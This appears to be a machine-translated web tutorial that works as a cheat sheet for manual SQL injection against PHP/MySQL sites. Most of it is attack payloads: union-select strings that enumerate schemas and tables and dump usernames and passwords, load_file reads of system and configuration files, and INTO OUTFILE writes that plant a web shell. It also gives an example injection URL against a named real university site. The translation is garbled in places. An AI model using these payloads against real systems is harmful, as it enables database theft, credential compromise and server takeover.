PHP + MySQL manual injection statement Daquan recommendation _ PHP Tutorial

PHP + MySQL manual injection statement is recommended. The length of the violent field Orderbynum * matches the field and11unionselect1, 2, 3, 4, 5 ....... N * brute force field location and12unionselect1, 2, 3, 4, 5 ..... N * using built-in function brute-force database information ver Violent field length

Order by num /*

Matching field

And 1 = 1 union select 1, 2, 4, 5 ....... N /*

Violent field location

And 1 = 2 union select 1, 2, 3, 4, 5 ..... N /*

Using built-in function brute-force database information

Version () database () user ()

You do not need to guess the available field brute-force database information (some websites are not applicable ):

And 1 = 2 union all select version ()/*

And 1 = 2 union all select database ()/*

And 1 = 2 union all select user ()/*

Operating system information:

And 1 = 2 union all select @ global. version_compile_ OS from mysql. user /*

Database permissions:

And ord (mid (user (), 114) =/* return normal description as root

Brute-force database (mysql> 5.0)

Mysql 5 and above have the built-in database information_schema, which stores all the database and table structure information of mysql.

And 1 = 2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema.SCHEMATA limit 0, 1

Guess table

And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA = database (hexadecimal) limit 0 (start record, 0 is the first start record), 1 (Display 1 record )-

Guess field

And 1 = 2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME = table name (hexadecimal) limit 0, 1

Brute force password

And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1

Advanced usage (two data contents are displayed for one available field ):

Union select 1, 2, 3 concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1

Write horse directly (Root permission)

Condition: 1. know the physical path of the site

2. have sufficient permissions (you can use select .... From mysql. user test)

3. magic_quotes_gpc () = OFF

Select' 'Into outfile' physical path'

And 1 = 2 union all select one sentence HEX value into outfile 'path'

Load_file () common paths:

1. replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)
2. replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))
The above two items show the full code in a php file. sometimes some characters are not replaced. for example, "<" is replaced with "space" and the webpage is returned. the code cannot be viewed.
3. load_file (char (47) can be used to list the root directories of FreeBSD and Sunos systems.
4. view the configuration file of the linux APACHE virtual host in/etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf.
5. run c: \ Program Files \ Apache Group \ Apache \ conf \ httpd. conf or C: \ apache \ conf \ httpd. conf to view the apache file in WINDOWS.
6. run c:/Resin-3.0.14/conf/resin. conf to view the resin file configuration of the website developed by jsp.
7. c:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf
8. d: \ APACHE \ Apache2 \ conf \ httpd. conf
9. C: \ Program Files \ mysql \ my. ini
10../themes/darkblue_orange/layout. inc. php phpmyadmin burst path
11. view the virtual host configuration file of IIS in c: \ windows \ system32 \ inetsrv \ MetaBase. xml.
12. view the resin configuration file 3.0.22 in/usr/local/resin-3.0.22/conf/RESIN. conf.
13./usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above.
14./usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe vm view
15. View firewall policies in/etc/sysconfig/iptables.
16. equivalent settings of usr/local/app/php5 B/php. ini PHP
17./etc/my. cnf MYSQL configuration file
18. System version of/etc/redhat-release Red Hat
19. C: \ mysql \ data \ mysql \ user. MYD has a user password in the MYSQL system.
20,/etc/sysconfig/network-scripts/ifcfg-eth0 to view the IP.
21./usr/local/app/php5 B/php. ini // PHP settings
22./usr/local/app/apache2/conf/extra tpd-vhosts.conf // virtual website settings
23. C: \ Program Files \ RhinoSoft.com \ Serv-U \ ServUDaemon. ini
24. c: \ windows \ my. ini
25. c: \ boot. ini

Common website configuration files: config. inc. php and config. php. Replace (load_file (HEX), char (60), char (32) must be used for load_file ))

Note:

Char (60) indicates <

Char (32) indicates space

Problems with manual injection:

After the injection, the page displays:

Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation 'Union'

Such as: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20

This is caused by inconsistent pre-and post-encoding,

Solution: add unhex (hex (parameter) before the parameter. The above URL can be changed:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3, 4, unhex (hex (user () % 20

You can continue to inject...

Distinct Order by num/* matching field and 1 = 1 union select 1, 2, 3, 4, 5 ....... N/* violent field location and 1 = 2 union select 1, 2, 3, 4, 5 ..... N/* use built-in function brute-force database information ver...